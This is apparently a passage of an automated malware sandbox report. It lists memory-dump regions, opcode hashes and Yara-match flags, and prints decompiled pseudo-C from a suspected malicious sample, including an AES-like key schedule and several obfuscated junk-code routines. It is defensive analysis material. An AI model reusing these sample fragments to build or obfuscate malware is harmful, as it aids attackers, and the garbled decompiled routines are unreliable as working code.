            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6a555215846437c86ef06aba17bba934fa35095e14f2a7b18d5a3baaee9d73d1
            • Instruction ID: d2ccdba01af2a5a40d8e57dce7eb3dd8d815edca6f1232d6bcde7bf96fb3ade9
            • Opcode Fuzzy Hash: 6a555215846437c86ef06aba17bba934fa35095e14f2a7b18d5a3baaee9d73d1
            • Instruction Fuzzy Hash: EB612136A002198BCB25CF58C49437FB7B1EF89300B2880B9E955DB395DB38C942CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f2513d98d8fb3b14593f7f22d9c084d42f708c82d977be58627f0782e43ba137
            • Instruction ID: 76ab7615205086546bef73c76c556f9ef20a7ab4eecf7d81a03a7d7c063dbffe
            • Opcode Fuzzy Hash: f2513d98d8fb3b14593f7f22d9c084d42f708c82d977be58627f0782e43ba137
            • Instruction Fuzzy Hash: E3817D75E0060ADFCB09CF68C480AAABBF1FF59310F148669E855DB385D734EA51CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ade372b2eb468adff0cac66fda0420d33d65bb8bd0d2302a374b1850e77ad93e
            • Instruction ID: 9c299638213a5083824f9985012e3dd53646b00059c053a6c4348f55b1a8fcf0
            • Opcode Fuzzy Hash: ade372b2eb468adff0cac66fda0420d33d65bb8bd0d2302a374b1850e77ad93e
            • Instruction Fuzzy Hash: DB51FF32B006169FCB18CF9CD891A79B7F2EB99310754812EE806CB395DB34ED91CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
            • Instruction ID: baf7c5a2f5cdda00f2191b5ae26822e6632ed8d6c86409fdec9e9b18adb66b92
            • Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
            • Instruction Fuzzy Hash: EB51E1B4700615DBCB24EF69C590A6ABBF2FF89310F24816DE44A9B341D7719D42CF60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c90fcdbe130005330eb85e90d1769a7c9fd4a8b4ceae3cf3719a7b1f8362855c
            • Instruction ID: 8ca692408a7d94d47cc8c7a80422da212292402c2c2c57b0a211b46b185aea34
            • Opcode Fuzzy Hash: c90fcdbe130005330eb85e90d1769a7c9fd4a8b4ceae3cf3719a7b1f8362855c
            • Instruction Fuzzy Hash: 2251E279D04269CFDF31CF68C945BAEBBB0BF88714F2041ADE859AB282D7704D419B90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
            				signed int _t66;
            				signed int* _t69;
            				signed int* _t81;
            				signed int _t94;
            				signed int _t96;
            				signed int _t106;
            				signed int _t108;
            				signed int* _t110;
            				signed int _t127;
            				signed int _t129;
            				signed int _t133;
            				signed int _t152;
            				intOrPtr _t171;
            
            				_t81 = _a12;
            				_t110 = _a8;
            				asm("ror esi, 0x8");
            				asm("rol eax, 0x8");
            				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
            				_t66 =  &(_t110[1]);
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
            				if(_a16 != 0x100) {
            					L4:
            					return _t66 | 0xffffffff;
            				} else {
            					_t171 = _a4;
            					_t69 = 0;
            					_a12 = 0;
            					while(1) {
            						_t152 =  *(_t66 + 0x18);
            						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
            						_t127 =  *_t66 ^ _t94;
            						 *(_t66 + 0x1c) = _t94;
            						_t96 =  *(_t66 + 4) ^ _t127;
            						 *(_t66 + 0x20) = _t127;
            						_t129 =  *(_t66 + 8) ^ _t96;
            						 *(_t66 + 0x24) = _t96;
            						 *(_t66 + 0x28) = _t129;
            						if(_t69 == 6) {
            							break;
            						}
            						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
            						_t133 =  *(_t66 + 0x10) ^ _t106;
            						 *(_t66 + 0x2c) = _t106;
            						_t108 =  *(_t66 + 0x14) ^ _t133;
            						 *(_t66 + 0x34) = _t108;
            						_t69 =  &(_a12[0]);
            						 *(_t66 + 0x30) = _t133;
            						 *(_t66 + 0x38) = _t108 ^ _t152;
            						_t66 = _t66 + 0x20;
            						_a12 = _t69;
            						if(_t69 < 7) {
            							continue;
            						} else {
            							goto L4;
            						}
            						goto L6;
            					}
            					return 0xe;
            				}
            				L6:
            			}

















            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 99fbeadb31e037a38a4927daf7e0d8ac2e5cd47a127740585f1703ed90c48254
            • Instruction ID: f9492f3af6f08cd2ecca4c7cf3cd7d69ffed67b405af7241e6593ba2b66022cd
            • Opcode Fuzzy Hash: 99fbeadb31e037a38a4927daf7e0d8ac2e5cd47a127740585f1703ed90c48254
            • Instruction Fuzzy Hash: C551F170A0060AEFDB04DF64C964BBFB7B5FF54311F10412AE422976A0DB74A955CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e071a218df035798d556e04d7a041afcbba84b84a005531a9e7e5ff35d1ae27d
            • Instruction ID: c8979917871b2ab231d157749fc2e9db59ed74d411fe29bf6ae2a82744baed18
            • Opcode Fuzzy Hash: e071a218df035798d556e04d7a041afcbba84b84a005531a9e7e5ff35d1ae27d
            • Instruction Fuzzy Hash: CA513732A11684EFDB269F96CD40B7B737AFF90750F184469F9158B261CA78DD01CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 17c672f25a8d81aee7f85323b0e953a54142d922c011bc6a02bc891d2fd58c3f
            • Instruction ID: e7ab32afde61abfd94f0cc07f60c0ca5f4665802320dc17a97a647f06ad4145e
            • Opcode Fuzzy Hash: 17c672f25a8d81aee7f85323b0e953a54142d922c011bc6a02bc891d2fd58c3f
            • Instruction Fuzzy Hash: 3F51F431A157428FD315DF28C695BAAB7E0FF82314F184469E8468B2D3EB75EC05CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 380bc034c2280aa666816a7c652e82654e3818f9d7f74758e012ab12d19db2b3
            • Instruction ID: 3e4f2e0d56ed8562a3aae86ed7b4f56eea2917c7e774f5cc8ca76b0dc811183a
            • Opcode Fuzzy Hash: 380bc034c2280aa666816a7c652e82654e3818f9d7f74758e012ab12d19db2b3
            • Instruction Fuzzy Hash: ED51EE31205781ABC322DF68C942B2BB7E4FF94714F10092EF5A583652E774EC04C791
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00402D87(void* __eax, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
            				signed char _v1957312885;
            				signed int _t71;
            				signed int* _t76;
            				signed int* _t89;
            				signed int _t102;
            				signed int _t104;
            				signed int _t114;
            				signed int _t116;
            				signed int* _t119;
            				signed int _t136;
            				signed int _t138;
            				signed int _t142;
            				signed int _t163;
            				intOrPtr _t185;
            
            				 *((char*)(__eax - 0x2e)) =  *((char*)(__eax - 0x2e)) + 0x66;
            				_v1957312885 = _v1957312885 << 0xec;
            				_t89 = _a16;
            				_t119 = _a12;
            				asm("ror esi, 0x8");
            				asm("rol eax, 0x8");
            				 *_t119 =  *_t89 & 0xff00ff00 |  *_t89 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[1] = _t89[1] & 0xff00ff00 | _t89[1] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[2] = _t89[2] & 0xff00ff00 | _t89[2] & 0x00ff00ff;
            				_t71 =  &(_t119[1]);
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[3] = _t89[3] & 0xff00ff00 | _t89[3] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[4] = _t89[4] & 0xff00ff00 | _t89[4] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[5] = _t89[5] & 0xff00ff00 | _t89[5] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[6] = _t89[6] & 0xff00ff00 | _t89[6] & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t119[7] = _t89[7] & 0xff00ff00 | _t89[7] & 0x00ff00ff;
            				if(_a20 != 0x100) {
            					L5:
            					return _t71 | 0xffffffff;
            				} else {
            					_t185 = _a4;
            					_t76 = 0;
            					_a12 = 0;
            					while(1) {
            						_t163 =  *(_t71 + 0x18);
            						_t102 = ( *(_t185 + 4 + (_t163 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t185 +  &(_t76[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t185 + 4 + (_t163 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t185 + 5 + (_t163 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t185 + 4 + (_t163 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t71 - 4);
            						_t136 =  *_t71 ^ _t102;
            						 *(_t71 + 0x1c) = _t102;
            						_t104 =  *(_t71 + 4) ^ _t136;
            						 *(_t71 + 0x20) = _t136;
            						_t138 =  *(_t71 + 8) ^ _t104;
            						 *(_t71 + 0x24) = _t104;
            						 *(_t71 + 0x28) = _t138;
            						if(_t76 == 6) {
            							break;
            						}
            						_t114 = ( *(_t185 + 4 + (_t138 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t185 + 4 + (_t138 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t185 + 4 + (_t138 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t185 + 5 + (_t138 & 0x000000ff) * 4) & 0x000000ff ^  *(_t71 + 0xc);
            						_t142 =  *(_t71 + 0x10) ^ _t114;
            						 *(_t71 + 0x2c) = _t114;
            						_t116 =  *(_t71 + 0x14) ^ _t142;
            						 *(_t71 + 0x34) = _t116;
            						_t76 =  &(_a12[0]);
            						 *(_t71 + 0x30) = _t142;
            						 *(_t71 + 0x38) = _t116 ^ _t163;
            						_t71 = _t71 + 0x20;
            						_a12 = _t76;
            						if(_t76 < 7) {
            							continue;
            						} else {
            							goto L5;
            						}
            						goto L7;
            					}
            					return 0xe;
            				}
            				L7:
            			}


















            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

            C-Code - Quality: 61%
            			E0041E20E(void* __eax, void* __ebx, signed int __ecx, signed int __edx, void* __esi) {
            				signed int _t23;
            				signed int _t24;
            				char _t27;
            				signed char _t31;
            				signed int _t32;
            				signed int _t44;
            				intOrPtr _t54;
            				intOrPtr _t55;
            
            				_t32 = __ecx;
            				_t43 = __edx & 0xcc32c1de;
            				 *0x16efa8e0 =  *0x16efa8e0 | _t43;
            				asm("rol byte [0xb4a0470c], 0x18");
            				asm("sbb [0xc2ccecc9], bh");
            				_pop(_t45);
            				asm("sbb [0x16d24939], esi");
            				asm("rcr byte [0x3ccdc486], 0xc");
            				_t23 = __eax -  *0x32c1ddbd;
            				 *0x93b70016 =  *0x93b70016 >> 0xeb;
            				_t27 = __ebx - 1;
            				if(_t27 < 0) {
            					goto L1;
            					do {
            						do {
            							do {
            								do {
            									L1:
            									_t1 = _t55;
            									_t55 =  *0xb0939ff7;
            									 *0xb0939ff7 = _t1;
            									_t44 = _t43 ^  *0x748f83e7;
            									_t54 = _t54 - 1;
            									 *0xc4bbc419 =  *0xc4bbc419 ^ _t44;
            									asm("adc al, [0x759084e5]");
            									asm("adc dl, 0x63");
            									_t43 = _t44 |  *0xb00218dd;
            									asm("scasb");
            								} while (_t43 >= 0);
            								_t55 = _t55 +  *0xe77cd173;
            								asm("lodsb");
            								asm("sbb [0xef4544a1], esi");
            								asm("sbb ebx, [0x2f9d1616]");
            								 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t43;
            								_t32 = _t32 &  *0xefca2585;
            								_t43 = _t43 +  *0xe0cc32b2;
            								asm("ror byte [0xa616efa8], 0x85");
            								_t23 = _t23 |  *0xa91945c6;
            								_t54 = _t54 -  *0xcc32c1da;
            								asm("adc bl, 0xe0");
            								asm("sbb [0x3916efa8], ch");
            								_t2 = _t45;
            								_t45 =  *0x997775c8;
            								 *0x997775c8 = _t2;
            								 *0xa8c4a800 =  *0xa8c4a800 >> 0;
            								asm("adc [0x16ef45d8], esi");
            							} while (_t54 != 0);
            							 *0x32c1c68f =  *0x32c1c68f >> 0x2d;
            							asm("rol dword [0xefa8e0cc], 0x57");
            							_t55 = _t55 -  *0x7bc83816;
            							 *0x4052173a =  *0x4052173a ^ _t23;
            							_push(_t23);
            							 *0x50405217 =  *0x50405217 >> 0x36;
            							 *0x81c42916 =  *0x81c42916 + _t27 +  *0xef45d88d;
            							 *0x4052173a = _t32 -  *0xf2098b7a + 0x3a;
            							_t4 = _t54;
            							_t54 =  *0xef45d88d;
            							 *0xef45d88d = _t4;
            							_t45 = 0x9cba1d16;
            							_t24 = _t23;
            							asm("adc [0xaddd0fb4], ch");
            							 *0x87dbae16 =  *0x87dbae16 >> 0x6e;
            							 *0xe7553110 =  *0xe7553110 ^ _t43;
            							_t43 = 0x32ee16ef;
            							 *0x1db40ffd =  *0x1db40ffd & _t24;
            							 *0xe0cc3283 =  *0xe0cc3283 >> 0x7c;
            							_push( *0x6d2b16ef);
            							asm("sbb edi, [0xe0cc32c1]");
            							_t23 = _t24 -  *0x8a16efa8;
            							 *0xbe17ff2f =  *0xbe17ff2f << 0x1c;
            							asm("adc ecx, 0xcc32bfdd");
            							 *0x16efa8e0 =  *0x16efa8e0 << 0xf0;
            							_t27 =  *0x2b7093ff;
            							 *0xfa34f216 =  *0xfa34f216 ^ 0x32ee16ef;
            							 *0xb9d9b004 =  *0xb9d9b004 << 0xb8;
            							 *0xa8e0cc32 =  *0xa8e0cc32 - _t27;
            							 *0x1ee67b3 =  *0x1ee67b3 ^ _t23;
            							_t32 =  *0x32c5f7c6 - 1;
            							 *0xa2f716d2 = _t27;
            						} while (_t32 <= 0);
            						 *0x36b616d2 =  *0x36b616d2 & 0x32ee16ef;
            						asm("rcl dword [0xebb8140b], 0x12");
            						_t23 = _t23 &  *0xe2aa9076 |  *0xe0cc32cc;
            						asm("sbb [0xa816efa8], cl");
            						asm("rcr byte [0xcc32c1d7], 0xc9");
            						_t43 = 0x32ee160f;
            						_t31 =  *0x9d8d8ce2 & 0x000000a8;
            						 *0xf2ba16ef = _t32 - 1;
            						_pop( *0x395fc3cc);
            						 *0x420816d2 =  *0x420816d2 << 0x7f;
            						_t55 =  *0xf2c1ab9c;
            						 *0xf2c1ab9c =  *0x9c01269e;
            						 *0xbda7983e =  *0xbda7983e & 0x9cba1d16;
            						 *0x16d24939 =  *0x16d24939 ^ 0x9cba1d16;
            						asm("adc ah, [0x71c621c]");
            						asm("movsb");
            						asm("adc eax, [0xcc32c1db]");
            						 *0x16efa8e0 = 0x32ee160f;
            						_t32 = 0x7c73a2fe;
            						_t54 =  *0x16ef45d8;
            						asm("sbb [0x9ba0f4be], ebp");
            						 *0xa899d1b4 =  *0xa899d1b4 ^ _t31;
            						_pop(_t45);
            						_t27 = 0x16d24939 + _t31;
            					} while (_t27 != 0);
            					return _t23;
            				} else {
            					__edx = __edx - 0xaf88ac70;
            					_pop(__edi);
            					asm("rcl byte [0x54942410], 0xe5");
            					asm("sbb dh, 0xb4");
            					asm("adc edi, [0x8daddd0f]");
            					__eax = __eax -  *0x16ef45d8;
            					__esp = __esp - 1;
            					 *0x897790e0 =  *0x897790e0 << 0x41;
            					asm("rcr byte [0xa8c4a800], 0x3");
            					asm("rcr dword [0x16ef45d8], 0xf0");
            					__ebx = 0x2bc09e3f;
            					 *0xb2a10f9e =  *0xb2a10f9e ^ __eax;
            					__edx = __edx ^  *0x80d68f16;
            					 *0xa8008263 =  *0xa8008263 << 0x55;
            					__ebx = 0x2bc09e3f ^  *0x45d8a8c4;
            					__edx = __edx ^  *0x121f16ef;
            					 *0xf9e2bbc =  *0xf9e2bbc & __edi;
            					asm("rcl dword [0x40ecb2a1], 0x5c");
            					__cl = __cl -  *0xcc319fe2;
            					asm("adc ebp, [0x5fc2ccf0]");
            					asm("sbb [0x16d24939], esi");
            					__ebx = (0x2bc09e3f ^  *0x45d8a8c4) -  *0x2e339416;
            					return __eax;
            				}
            			}












            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

            C-Code - Quality: 65%
            			E0041DFA8(signed int __eax, char __ebx, signed int __ecx, signed char __edx, intOrPtr __edi) {
            				char _v5;
            				signed int _t20;
            				signed int _t21;
            				char _t23;
            				signed char _t27;
            				signed int _t28;
            				signed int _t39;
            				intOrPtr _t50;
            				intOrPtr _t53;
            
            				_t40 = __edi;
            				_t38 = __edx;
            				_t28 = __ecx;
            				_t23 = __ebx;
            				_t20 = __eax;
            				goto L1;
            				do {
            					do {
            						do {
            							do {
            								L1:
            								_t1 = _t53;
            								_t53 =  *0xb0939ff7;
            								 *0xb0939ff7 = _t1;
            								_t39 = _t38 ^  *0x748f83e7;
            								 *0xc4bbc419 =  *0xc4bbc419 ^ _t39;
            								asm("adc al, [0x759084e5]");
            								asm("adc dl, 0x63");
            								_t38 = _t39 |  *0xb00218dd;
            								asm("scasb");
            							} while (_t38 >= 0);
            							_t53 = _t53 +  *0xe77cd173;
            							asm("lodsb");
            							asm("sbb [0xef4544a1], esi");
            							asm("sbb ebx, [0x2f9d1616]");
            							 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t38;
            							_t28 = _t28 &  *0xefca2585;
            							_t38 = _t38 +  *0xe0cc32b2;
            							asm("ror byte [0xa616efa8], 0x85");
            							_t20 = _t20 |  *0xa91945c6;
            							_t50 =  &_v5 -  *0xcc32c1da;
            							asm("adc bl, 0xe0");
            							asm("sbb [0x3916efa8], ch");
            							_t2 = _t40;
            							_t40 =  *0x997775c8;
            							 *0x997775c8 = _t2;
            							 *0xa8c4a800 =  *0xa8c4a800 >> 0;
            							asm("adc [0x16ef45d8], esi");
            						} while (_t50 != 0);
            						 *0x32c1c68f =  *0x32c1c68f >> 0x2d;
            						asm("rol dword [0xefa8e0cc], 0x57");
            						_t53 = _t53 -  *0x7bc83816;
            						 *0x4052173a =  *0x4052173a ^ _t20;
            						_push(_t20);
            						 *0x50405217 =  *0x50405217 >> 0x36;
            						 *0x81c42916 =  *0x81c42916 + _t23 +  *0xef45d88d;
            						 *0x4052173a = _t28 -  *0xf2098b7a + 0x3a;
            						 *0xef45d88d = _t50;
            						_t40 = 0x9cba1d16;
            						_t21 = _t20;
            						asm("adc [0xaddd0fb4], ch");
            						 *0x87dbae16 =  *0x87dbae16 >> 0x6e;
            						 *0xe7553110 =  *0xe7553110 ^ _t38;
            						_t38 = 0x32ee16ef;
            						 *0x1db40ffd =  *0x1db40ffd & _t21;
            						 *0xe0cc3283 =  *0xe0cc3283 >> 0x7c;
            						_push( *0x6d2b16ef);
            						asm("sbb edi, [0xe0cc32c1]");
            						_t20 = _t21 -  *0x8a16efa8;
            						 *0xbe17ff2f =  *0xbe17ff2f << 0x1c;
            						asm("adc ecx, 0xcc32bfdd");
            						 *0x16efa8e0 =  *0x16efa8e0 << 0xf0;
            						_t23 =  *0x2b7093ff;
            						 *0xfa34f216 =  *0xfa34f216 ^ 0x32ee16ef;
            						 *0xb9d9b004 =  *0xb9d9b004 << 0xb8;
            						 *0xa8e0cc32 =  *0xa8e0cc32 - _t23;
            						 *0x1ee67b3 =  *0x1ee67b3 ^ _t20;
            						_t28 =  *0x32c5f7c6 - 1;
            						 *0xa2f716d2 = _t23;
            					} while (_t28 <= 0);
            					 *0x36b616d2 =  *0x36b616d2 & 0x32ee16ef;
            					asm("rcl dword [0xebb8140b], 0x12");
            					_t20 = _t20 &  *0xe2aa9076 |  *0xe0cc32cc;
            					asm("sbb [0xa816efa8], cl");
            					asm("rcr byte [0xcc32c1d7], 0xc9");
            					_t38 = 0x32ee160f;
            					_t27 =  *0x9d8d8ce2 & 0x000000a8;
            					 *0xf2ba16ef = _t28 - 1;
            					_pop( *0x395fc3cc);
            					 *0x420816d2 =  *0x420816d2 << 0x7f;
            					_t53 =  *0xf2c1ab9c;
            					 *0xf2c1ab9c =  *0x9c01269e;
            					 *0xbda7983e =  *0xbda7983e & 0x9cba1d16;
            					 *0x16d24939 =  *0x16d24939 ^ 0x9cba1d16;
            					asm("adc ah, [0x71c621c]");
            					asm("movsb");
            					asm("adc eax, [0xcc32c1db]");
            					 *0x16efa8e0 = 0x32ee160f;
            					_t28 = 0x7c73a2fe;
            					asm("sbb [0x9ba0f4be], ebp");
            					 *0xa899d1b4 =  *0xa899d1b4 ^ _t27;
            					_pop(_t40);
            					_t23 = 0x16d24939 + _t27;
            				} while (_t23 != 0);
            				return _t20;
            			}













            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

            C-Code - Quality: 100%
            			E00401030(signed char* __eax) {
            				signed char* _t37;
            				unsigned int _t65;
            				unsigned int _t73;
            				unsigned int _t81;
            				unsigned int _t88;
            				signed char _t94;
            				signed char _t97;
            				signed char _t100;
            
            				_t37 = __eax;
            				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
            				_t94 = __eax[0xb];
            				if((_t94 & 0x00000001) != 0) {
            					_t65 = _t65 | 0x80000000;
            				}
            				_t37[0xc] = _t65 >> 0x18;
            				_t37[0xf] = _t65;
            				_t37[0xd] = _t65 >> 0x10;
            				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
            				_t97 = _t37[7];
            				_t37[0xe] = _t65 >> 8;
            				if((_t97 & 0x00000001) != 0) {
            					_t73 = _t73 | 0x80000000;
            				}
            				_t37[8] = _t73 >> 0x18;
            				_t37[0xb] = _t73;
            				_t37[9] = _t73 >> 0x10;
            				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
            				_t100 = _t37[3];
            				_t37[0xa] = _t73 >> 8;
            				if((_t100 & 0x00000001) != 0) {
            					_t81 = _t81 | 0x80000000;
            				}
            				_t37[4] = _t81 >> 0x18;
            				_t37[7] = _t81;
            				_t37[5] = _t81 >> 0x10;
            				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
            				 *_t37 = _t88 >> 0x18;
            				_t37[1] = _t88 >> 0x10;
            				_t37[6] = _t81 >> 8;
            				_t37[2] = _t88 >> 8;
            				_t37[3] = _t88;
            				return _t37;
            			}












            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

            C-Code - Quality: 34%
            			E0040E376(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edi, void* __esi) {
            				intOrPtr _t27;
            				signed int _t30;
            				signed int _t31;
            				intOrPtr _t33;
            				signed int _t34;
            				signed int* _t39;
            				signed int _t41;
            				signed int _t48;
            
            				_t35 = __edi;
            				_t30 = __ecx;
            				asm("clc");
            				_t39 = __esi + 1;
            				_t32 = 0;
            				_push(0);
            				asm("cli");
            				asm("adc al, [edx]");
            				_t27 = __eax;
            				asm("cmc");
            				asm("out 0xc, eax");
            				asm("aam 0xd9");
            				_t2 = __ecx + 0x17;
            				 *_t2 =  *((intOrPtr*)(__ecx + 0x17)) + _t41;
            				asm("in eax, 0xc3");
            				asm("outsd");
            				asm("enter 0xc8d6, 0xb1");
            				if( *_t2 <= 0) {
            					_t32 = __edi;
            					_pop(_t35);
            					 *((intOrPtr*)(__ecx + 0x6219fda1)) =  *((intOrPtr*)(__ecx + 0x6219fda1)) - _t41;
            				}
            				_t33 = _t32;
            				asm("out 0x8b, eax");
            				_push(_t27);
            				asm("fldcw word [ebx]");
            				_t31 = _t30 |  *_t39;
            				_t48 = _t31;
            				 *((intOrPtr*)(_t33 + _t35 * 4 - 0x2a)) = _t27;
            				asm("repne jo 0xffffffbc");
            				_t14 = _t39 - 0x5fa8129a;
            				_t34 =  *_t14;
            				 *_t14 = _t33;
            				do {
            					_push(_t35);
            					asm("wait");
            					asm("outsd");
            					 *_t31 = _t31;
            				} while (_t48 >= 0);
            				_push(ss);
            				_push(0x83cd40);
            				 *((intOrPtr*)(_t34 - 0x2b281c25)) = cs;
            				asm("btc [eax-0x47ec54d3], ebx");
            				asm("salc");
            				asm("fldl2e");
            				asm("pushad");
            				 *0xa8e47485 =  *0xa8e47485 << 1;
            				return _t41 & _t34;
            			}












            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 936446da7390a81d2846c86c1ac54fd6819d49e08dd5987401106c301d368d17
            • Instruction ID: 3ba64b5b609e00d1033b2a0d983d933db273c4b7bb8347707fdd36fd9b13afe3
